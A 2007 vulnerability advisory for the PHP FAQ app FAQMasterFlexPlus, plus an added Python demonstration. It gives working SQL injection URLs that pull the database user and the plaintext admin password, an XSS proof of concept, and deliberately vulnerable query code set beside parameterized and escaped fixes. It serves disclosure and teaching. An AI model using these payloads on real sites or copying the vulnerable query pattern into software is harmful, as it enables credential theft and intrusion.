FAQMasterFlexPlus multiple vulnerabilities
Published 2007-12-31 (last modified 2008-02-08) at https://blogs.ua.es/jgaliana/2007/12/31/faqmasterflexplus-multiple-vulnerabilities/

- Security Advisory -

- FAQMasterFlexPlus multiple vulnerabilities -
---------------------------------------------

Product:        FAQMasterFlexPlus
Version:        Latest version is affected; other versions not tested
Vendor:         http://www.netbizcity.com
Affected by:    Cross-Site Scripting & SQL injection

I. Introduction

FaqMasterFlexPlus is a free, database-driven web application written in PHP for creating and maintaining Frequently Asked Questions (FAQs) on a web site. It has language support, and according to its documentation it "allows you to create unlimited categories and unlimited Questions/Answers and has web-based category and FAQ administration with Add, Edit, Delete capability."

It is free software, released under the GNU General Public License (GPL). It works with PHP and MySQL and comes bundled in some versions of Fantastico (cPanel X).

II. Description

Multiple flaws have been discovered in FaqMasterFlexPlus:

1) Cross-Site Scripting

The script faq.php has an XSS bug: the variable $cat_name is echoed into the page without being sanitized. An attacker exploiting this flaw can perform an XSS attack to steal the targeted user's cookies.

The admin scripts to add/edit/delete categories and add/edit/delete FAQs also fail to sanitize user-supplied input.

PoC: http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS]

2) SQL Injection (exploiting this issue requires magic_quotes_gpc to be set to Off in php.ini)

All the scripts are vulnerable to SQL injection: request parameters are placed directly into the queries sent to the database, so a single quote in category_id ends the intended string literal and everything after it is parsed as SQL.

PoC: http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*

The page then shows a new line like this:

Q faquser@localhost

Proof of concept to get the admin password:

http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin

Q supersecretpassword

bingo! ;)

Besides this, the password is stored in plain text, which is a serious security flaw on its own.

This software contains many bugs and must be fully audited before it can be considered secure.

III. Timeline

08/05/2007 - Bugs discovered
10/05/2007 - Vendor contacted (no response)
12/12/2007 - Vendor contacted again (no response)
28/12/2007 - Advisory disclosed

IV. Credits

Juan Galiana <jgaliana gmail com>

Regards

You can find the security advisory archived at these links: one (http://www.securityfocus.com/bid/27052) and two (http://www.securityfocus.com/bid/27051).
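The following is an added illustration of the two flaws in section II and of their fixes. It is not FAQMasterFlexPlus code and was not written by the advisory's author: the application's PHP source is not on this page, so the schema (a `faqs` table with four columns and a `users` table with `userid` and `passwrd` columns, as the PoC URL names them), the query shape, and the sample rows are constructed assumptions. SQLite stands in for MySQL, which is why the payload follows the advisory's second PoC (the `passwrd` one) rather than the first: SQLite has no `user()` function, but the trick of letting the query's own closing quote terminate the injected `'admin` literal works in both databases.

```python
"""Added example, not FAQMasterFlexPlus code: reconstructs the faq.php SQL
injection and $cat_name XSS from the advisory, side by side with the fixes.
Schema, column names, sample rows and payload are constructed assumptions."""
import hashlib
import hmac
import html
import os
import sqlite3


def make_db():
    """Constructed sample database standing in for the application's MySQL tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE faqs (id INTEGER, category_id INTEGER, question TEXT, answer TEXT);
        CREATE TABLE users (userid TEXT, passwrd TEXT);
        INSERT INTO faqs VALUES (1, 1, 'How do I reset my password?', 'Use the reset link.');
        INSERT INTO users VALUES ('admin', 'supersecretpassword');
    """)
    return db


def faq_vulnerable(db, category_id):
    """Mirrors the flaw: request input is concatenated straight into the SQL text,
    so a quote inside category_id ends the literal and the remainder is parsed as SQL."""
    sql = ("SELECT id, category_id, question, answer FROM faqs "
           f"WHERE category_id = '{category_id}'")
    return db.execute(sql).fetchall()


def faq_fixed(db, category_id):
    """Validate the type first (a category id is an integer), then bind it as a
    parameter so the database driver never lets it be parsed as SQL."""
    cat = int(category_id)  # raises ValueError for anything that is not an integer
    sql = "SELECT id, category_id, question, answer FROM faqs WHERE category_id = ?"
    return db.execute(sql, (cat,)).fetchall()


# Payload modelled on the advisory's second PoC: the original query's trailing
# quote closes the injected 'admin' literal, so no comment sequence is needed.
ADMIN_PASSWORD_PAYLOAD = "1' union select 1,1,passwrd,1 from users where userid='admin"


def heading_vulnerable(cat_name):
    """Echoes cat_name into HTML unescaped, as the advisory describes for faq.php."""
    return f"<h2>{cat_name}</h2>"


def heading_fixed(cat_name):
    """HTML-encode on output (htmlspecialchars() in PHP); the payload renders as text."""
    return f"<h2>{html.escape(cat_name, quote=True)}</h2>"


def hash_password(password, salt=None):
    """Replaces plaintext storage: store a random salt and a PBKDF2 hash, never the password."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, _ = stored.split("$")
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    db = make_db()
    for row in faq_vulnerable(db, ADMIN_PASSWORD_PAYLOAD):
        print("Q", row[2])  # one of these lines is the admin password, as in the advisory
    print(heading_vulnerable("<script>alert(1)</script>"))
    print(heading_fixed("<script>alert(1)</script>"))
```

Two caveats for anyone reproducing this against a real install. First, `magic_quotes_gpc`, which the advisory names as the setting that blocks the injection, only escapes quotes; it never protected numeric contexts without quotes, and it was removed entirely in PHP 5.4, so on any current PHP the "Off" precondition is always satisfied and only parameterized queries plus type validation, as in `faq_fixed`, close the hole. Second, the `/*` at the end of the advisory's first PoC is MySQL comment syntax used to discard the rest of the original query; the `'admin` variant shown here needs no comment because it reuses the query's own closing quote.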